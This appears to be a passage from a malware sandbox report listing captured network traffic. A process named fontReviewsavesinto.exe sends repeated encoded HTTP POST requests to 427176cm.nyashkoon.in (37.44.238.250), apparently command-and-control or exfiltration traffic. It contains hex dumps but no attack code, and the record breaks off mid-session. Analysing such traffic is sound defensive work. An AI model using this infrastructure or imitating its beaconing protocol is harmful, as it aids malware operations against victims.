                                        Nov 5, 2024 08:12:17.719855070 CET1.1.1.1192.168.2.70xff71No error (0)427176cm.nyashkoon.in37.44.238.250A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • 427176cm.nyashkoon.in

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.74974537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:17.737215042 CET310OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 336
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:18.086977959 CET336OUTData Raw: 00 07 04 06 03 0c 01 01 05 06 02 01 02 05 01 07 00 05 05 00 02 0c 03 08 07 00 0c 03 05 0f 03 57 0d 03 06 0a 02 06 05 07 0b 06 05 57 00 0a 07 01 07 04 0b 01 0f 0f 07 01 05 03 05 01 05 06 05 58 03 0a 0f 00 00 03 04 51 0e 53 0f 02 0f 51 0e 03 07 01
                                        Data Ascii: WWXQSQYSV\L~Ah`T`qae^h}O`l{^h`lxl{xsfh}RwYl~e~V@{SP}uy
                                        Nov 5, 2024 08:12:18.547844887 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:18.646564007 CET1236INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 1300
                                        Connection: keep-alive
                                        Data Raw: 56 4a 7d 59 6c 54 60 59 78 72 6b 5d 68 62 7c 5f 7e 67 7b 09 7f 5e 75 42 6d 05 70 4c 6a 72 60 49 60 05 69 40 6d 61 76 59 75 5f 74 00 69 61 78 01 55 4b 71 0c 60 04 77 07 7c 5c 5b 04 7c 67 50 41 79 75 70 09 7e 73 67 47 76 5c 79 41 74 5f 79 47 7f 5f 62 04 7e 6c 70 41 69 59 7c 5b 76 66 7b 06 7c 5c 50 5a 7d 5e 62 5e 78 01 6c 4d 6f 49 52 07 6c 53 5e 5a 78 62 60 01 7b 70 65 5d 7c 59 68 02 7b 59 70 44 7d 4c 5e 5d 77 62 70 02 7a 51 41 5b 7c 67 7c 0c 7c 07 7a 51 76 42 6c 03 6c 6f 74 01 74 70 5f 50 6d 5f 7e 5b 7e 42 62 4c 6c 07 61 58 77 63 63 01 61 61 60 06 63 71 6e 50 7e 5d 7a 06 76 62 6d 01 76 66 7f 50 7f 52 65 07 77 6f 77 5d 7c 70 7c 03 78 6c 60 5a 7a 73 76 01 7c 6d 60 08 77 67 6f 5c 7e 61 7d 50 69 6e 73 0b 6c 54 7a 04 7d 72 57 02 7b 5d 46 51 7c 6c 6c 40 6a 59 7c 40 7c 64 7e 43 6f 54 7c 5f 79 71 64 03 6b 62 7b 4b 69 64 63 08 68 5e 7d 0b 6e 73 5a 06 7e 62 7c 05 74 70 79 51 7b 5c 79 02 77 66 5a 01 7d 66 7c 04 7d 66 5b 0c 77 5c 63 03 7c 62 53 07 7d 67 72 09 7b 66 78 09 7e 63 73 02 75 72 69 4e 77 71 6d 02 7c 71 [TRUNCATED]
                                        Data Ascii: VJ}YlT`Yxrk]hb|_~g{^uBmpLjr`I`i@mavYu_tiaxUKq`w|\[|gPAyup~sgGv\yAt_yG_b~lpAiY|[vf{|\PZ}^b^xlMoIRlS^Zxb`{pe]|Yh{YpD}L^]wbpzQA[|g||zQvBllottp_Pm_~[~BbLlaXwccaa`cqnP~]zvbmvfPRewow]|p|xl`Zzsv|m`wgo\~a}PinslTz}rW{]FQ|ll@jY|@|d~CoT|_yqdkb{Kidch^}nsZ~b|tpyQ{\ywfZ}f|}f[w\c|bS}gr{fx~csuriNwqm|qf}Bp~wwvaU{b}G}`mJxIhL{Yxx}kzb`{sT``{w^|rQ@waR~R]Ip|amNv||x|xKvpz@yO}J~BTO{qvuMsvO^OtqP@NrvbSvupO|Rav|x|sRI{Bgz`PJSxNtY^~\rB}C{{CzL}Li|^RARZ~ph~wfMzmxb`|_kI|wwANyOy]p}LRFvc[Az_aKuHp~Xd~X}vbk}bW}gvyv|@~cvrywOyqvlx}IUvOcI{\S~`iIxg`xIpM{mQzLp{Mr{]NZlw`J~{aOpH~oE|wwPrbTvl`lUg\cYeRy_}G|lX_z\yvxBagx[L~Jx^PMcqibe{PhRf\cohOptxgl^fKmpcwR~ePzSYQa~[Cj`~[kgAh`{QiETWp~G|StXoLVkqwjg]~sbRnpl}[dwsXTm_yuu{YjdMyXHp[V_PrFVdWIT^Aiotbnvp_WY|aPK|R|~pJvasE{LaYwr]ldCT{o[WnWnYPd~{_k[TtM[PODqXQ\QtAVdUHPY@bo]FWXv]}lnm\XPAzE|XW]Zt@\bQF[Y@kcWG[qZkTxR_\pQN\koEUNo_FjsUcU@R]PQncQzP}cjnX_ [TRUNCATED]
                                        Nov 5, 2024 08:12:18.646683931 CET221INData Raw: 7c 6b 61 01 59 7b 59 5c 50 60 65 0c 48 57 70 64 5b 71 70 76 06 60 6d 6a 5c 52 4c 71 47 6a 51 77 7b 52 64 64 4a 59 62 7c 58 7c 5f 4f 59 69 06 6e 45 55 74 41 05 6c 01 55 40 6e 0b 7c 47 55 58 67 41 57 5a 61 43 56 71 77 45 6c 74 60 5a 7c 5f 7f 5e 74
                                        Data Ascii: |kaY{Y\P`eHWpd[qpv`mj\RLqGjQw{RddJYb|X|_OYinEUtAlU@n|GUXgAWZaCVqwElt`Z|_^tv^ioEP{gVSb_aCQ]Dcc`XrDikz|\zBqZR_ZwE]bSISXD`njE\yoSkkypQpFxZ]_TtAQcWCPUJ[XQnei~cQzP~_|uzYhcOPpoWQc^Wt[@oaBET[dX~\{ZUk
                                        Nov 5, 2024 08:12:18.700934887 CET286OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 384
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:18.932244062 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:18.932477951 CET384OUTData Raw: 5b 5b 43 52 59 5f 5f 50 5e 5e 54 55 56 58 5a 5d 5f 57 59 5c 52 5f 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[CRY__P^^TUVXZ]_WY\R_RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F3,09Y$8-;_=5#%<)..'3?'$*:&G!']*/
                                        Nov 5, 2024 08:12:19.244911909 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 02 33 06 2b 09 37 2a 03 0f 3f 00 20 59 36 09 24 02 38 3d 34 5b 27 55 2b 0f 29 2c 26 16 21 29 36 5d 35 3d 34 5f 23 2d 30 0d 3d 1b 2f 5a 07 10 25 5a 25 1c 34 0d 25 2e 24 5f 25 33 3f 15 3e 02 3b 02 22 38 3f 12 31 02 21 59 24 3a 3b 1b 2f 07 0b 56 3a 38 2c 04 3a 22 2f 01 26 34 2c 54 0d 10 39 1b 3e 31 2c 1e 29 05 39 5d 32 24 3b 0a 23 3e 23 12 3d 39 2c 52 3f 3d 00 14 24 23 20 50 35 22 2d 1d 31 28 38 5c 33 1f 3c 57 32 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :3+7*? Y6$8=4['U+),&!)6]5=4_#-0=/Z%Z%4%.$_%3?>;"8?1!Y$:;/V:8,:"/&4,T9>1,)9]2$;#>#=9,R?=$# P5"-1(8\3<W2%U,.V0WQ
                                        Nov 5, 2024 08:12:19.267184019 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:19.498859882 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:19.499053955 CET1300OUTData Raw: 5b 5c 46 5e 59 54 5a 51 5e 5e 54 55 56 52 5a 5f 5f 50 59 59 52 59 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\F^YTZQ^^TUVRZ__PYYRYRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A'<X0-'T ,80) [$<=>532]0[#Y0#Z**&G!']*
                                        Nov 5, 2024 08:12:19.803580999 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 33 3b 30 1c 23 3a 29 08 3f 2e 20 1e 22 51 3f 11 2f 3d 2b 00 27 23 2c 1c 3d 59 2d 0c 21 29 35 02 36 3d 2c 5e 34 07 2c 0c 2b 21 2f 5a 07 10 26 03 25 54 2f 1f 26 10 02 13 33 30 3f 5e 3e 5a 27 05 35 05 2b 5c 26 15 1b 59 26 29 23 51 2f 29 26 0c 39 5e 3c 04 3a 0f 37 01 32 1e 2c 54 0d 10 39 1b 3e 31 24 53 3e 02 13 5f 31 51 20 52 22 2d 38 00 2a 3a 33 0b 2a 2d 2a 15 27 0e 19 0b 35 0c 0c 0b 25 05 06 10 30 22 28 50 25 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :3;0#:)?. "Q?/=+'#,=Y-!)56=,^4,+!/Z&%T/&30?^>Z'5+\&Y&)#Q/)&9^<:72,T9>1$S>_1Q R"-8*:3*-*'5%0"(P%%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.74975137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:19.015861988 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:19.365067005 CET1032OUTData Raw: 5e 59 46 59 59 54 5a 51 5e 5e 54 55 56 59 5a 5f 5f 50 59 5a 52 5a 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YFYYTZQ^^TUVYZ__PYZRZRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'0'-&%!8,(<X)%0^'<,(=5%/&0$>*&G!']*+
                                        Nov 5, 2024 08:12:19.859914064 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:19.934771061 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.74976137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:20.057135105 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:20.411982059 CET1032OUTData Raw: 5b 59 46 5f 59 58 5a 53 5e 5e 54 55 56 52 5a 5e 5f 57 59 51 52 50 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF_YXZS^^TUVRZ^_WYQRPRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%"$^'1$ 88 X*&'''[)[.P'<!&=<'^$>&G!']*
                                        Nov 5, 2024 08:12:20.859441996 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:20.931188107 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:18 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.74976737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:21.062974930 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:21.412005901 CET1032OUTData Raw: 5b 5f 46 5d 5c 5d 5a 57 5e 5e 54 55 56 5f 5a 51 5f 57 59 50 52 58 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_F]\]ZW^^TUV_ZQ_WYPRXR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-0 Z3=)$2<;] =4X$? >[=0,"^3>'^04+*&G!']*3
                                        Nov 5, 2024 08:12:21.874322891 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:21.954360962 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.74977437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:22.087076902 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:22.443443060 CET1032OUTData Raw: 5b 5e 43 5c 5c 5f 5f 55 5e 5e 54 55 56 5c 5a 5a 5f 51 59 58 52 5a 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [^C\\__U^^TUV\ZZ_QYXRZRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A3 [3>!\3,[;;*&+'<$>="%,Y$#\0+ *&G!']*?
                                        Nov 5, 2024 08:12:22.931031942 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:23.014599085 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.74978037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:23.202200890 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:23.552611113 CET1032OUTData Raw: 5e 5d 46 5e 59 5b 5a 54 5e 5e 54 55 56 53 5a 5c 5f 5b 59 50 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]F^Y[ZT^^TUVSZ\_[YPRYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-0";$[>017;;8X>C X0*"3?*3'^#=:&G!']*
                                        Nov 5, 2024 08:12:24.012356043 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:24.085799932 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.74978637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:24.214518070 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:24.568234921 CET1032OUTData Raw: 5e 5e 46 5d 5c 5d 5a 53 5e 5e 54 55 56 5e 5a 5a 5f 5a 59 50 52 59 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^F]\]ZS^^TUV^ZZ_ZYPRYR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'1$[%-$2$,;?5?0,#_).)3<-0 '^(=:&G!']*7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.74978737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:24.824687004 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:25.177609921 CET1300OUTData Raw: 5e 5a 43 5e 59 5b 5a 57 5e 5e 54 55 56 5e 5a 5f 5f 54 59 5e 52 58 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZC^Y[ZW^^TUV^Z__TY^RXRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$0^'0"$[;0_)&;',$=-$"0('8;)&G!']*7
                                        Nov 5, 2024 08:12:25.634918928 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:25.715007067 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5e 25 3b 24 55 20 2a 3d 0f 3f 07 3f 05 21 37 0e 03 2c 2d 28 58 24 33 20 1c 29 3c 25 0d 20 00 2e 58 21 2e 28 59 23 2d 3c 0b 29 1b 2f 5a 07 10 25 5d 26 21 37 55 27 3e 02 59 33 30 2f 5e 3e 05 34 59 22 15 0d 12 26 2b 17 11 32 03 27 56 2c 39 03 52 2f 38 01 18 2e 21 0e 5a 26 34 2c 54 0d 10 3a 09 3e 0f 34 54 3e 02 22 07 25 37 15 0b 37 3d 38 01 2a 3a 20 19 2b 3e 22 17 25 30 33 0e 35 31 3e 0b 31 05 23 02 24 57 3c 51 26 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9^%;$U *=??!7,-(X$3 )<% .X!.(Y#-<)/Z%]&!7U'>Y30/^>4Y"&+2'V,9R/8.!Z&4,T:>4T>"%77=8*: +>"%0351>1#$W<Q&"%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.74979337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:24.958798885 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:25.321621895 CET1032OUTData Raw: 5e 5f 43 5d 59 5c 5f 55 5e 5e 54 55 56 59 5a 5d 5f 57 59 5b 52 50 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C]Y\_U^^TUVYZ]_WY[RPRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A%23=2$2;,80X=#'/4(--'/&0[7X3=&G!']*+
                                        Nov 5, 2024 08:12:25.783565998 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:25.861704111 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.74979837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:25.990725994 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:26.349411964 CET1028OUTData Raw: 5b 59 43 5c 59 55 5a 53 5e 5e 54 55 56 5a 5a 5e 5f 5a 59 58 52 5c 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC\YUZS^^TUVZZ^_ZYXR\RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'13'==Y%";[) 3/[>=0&X&=X$;(+:&G!']*
                                        Nov 5, 2024 08:12:26.813638926 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:26.895900965 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.74980437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:12:27.029160023 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
